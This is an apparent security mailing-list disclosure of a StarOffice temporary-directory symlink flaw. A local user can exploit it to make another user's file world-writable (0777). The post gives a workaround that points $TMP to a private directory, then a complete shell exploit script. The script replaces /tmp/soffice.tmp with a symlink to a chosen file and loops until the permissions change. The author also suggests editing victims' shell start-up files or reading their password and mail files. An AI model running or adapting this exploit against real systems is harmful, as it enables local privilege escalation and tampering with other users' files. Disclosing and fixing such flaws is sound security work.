HeliSec: StarOffice symlink exploit

[JeT Li <jet_li_man () yahoo com>]

        - = Helios Security and Administration = -

        Hi everyone,

        StarOffice creates a temporary directory in /tmp called soffice.tmp,
with permissions 0777. Into this directory other temporary files are creates,
with the format: svZZZZ.tmp, where ZZZZ in a four or five digits number.

        StarOffice not only create the /tmp/soffice.tmp directory with
permissions 0777, but also chmod() it sometimes when StarOffice is runing
afterwards. If any user create a symbolic link from /tmp/soffice.tmp to any
file owned by other user, when this last user run StarOffice the target of
the link will become 0777. So, if the directory of the target file is
accessible by the maliciosous user that created the symlink, he can do
whatever he wants with the file. A few ways to exploit this is:

        - to modify shell start-up files (as .profile, .bashrc, .cshrc, etc.)
to execute whatever the hackers wants next time victim logs in.
        - to gain access to private files with sensitive information, as
passwords files, mail spool files, etc.
        - a lot of more evil acts.

        StarOffice no give error message or such when it change the
permissions of the target file, so from the victim point of view: all is
going right ;-)

        Requeriments:

        - Access to the targe file directory needed.
        - The target file must NOT be executable.

        Fix:

        One way to fix the problem is to create a directory inside your
home directory which is inaccessible to anyone but yourself (permissions 700),
called tmp. Then insert an entry in your login start-up file to set the $TMP
environment variable to $HOME/tmp, so it will direct StarOffice to use your
temporary directory, rather than the system /tmp. Something like this (in
bash):

        [wushu@JeT-Li]$ TMP=$HOME/tmp ; export TMP
        (not permanent)
        or modify the .bash_profile adding TMP=$HOME/tmp and including this
variable in the export.

        Here is the xploit code, to make sure that this will work, run first
staroffice, so you will become owner of /tmp/soffice.tmp, necessary to remove
it and create the symlink.

#!/bin/sh
SOFFICE="/tmp/soffice.tmp"
TARGETFILE=$1

if [ $# != 1 ]; then
    echo
    echo "         - = HeliSec - Helios Security and Administration = -"
    echo "Usage : "
    echo "./soffice.sh <file>"
    echo "Set 0777 permissions to any file (access to the directory of the file needed)"
    echo "                                              JeT Li  -The Wushu Master-"
    exit
fi

if [ ! -f ${TARGETFILE} ]; then
    echo "Target file must exist"
    exit
fi

rm -rf ${SOFFICE}
ln -sn ${TARGETFILE} ${SOFFICE}
echo
echo "Symbolik link done ..."
echo

perl -e '$a=`ps aux | grep office`; $a =~ /soffice\.bin/ ?
print "StarOffice is running on this machine ... wait a minutes and
the permissions will have been set.\n" :
print "StarOffice is not running on this machine ...you may wait for
the signal (not recommended) or CTRL+C the program; when the user
run StarOffice the permissions will be set automaticly\n";'

while :
do
if [ `ls -al ${TARGETFILE} | awk '{printf $1}'` = "-rwxrwxrwx" ]; then
    echo
    echo "Permissions set succesfully ... good luck ;-)"
    echo
    echo "- = HeliSec - Helios Security and Administration = -"
    echo "                JeT Li        -The Wushu Master-"
    exit
fi
done

        Cheers,

                                        JeT Li  -The Wushu Master-      

_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com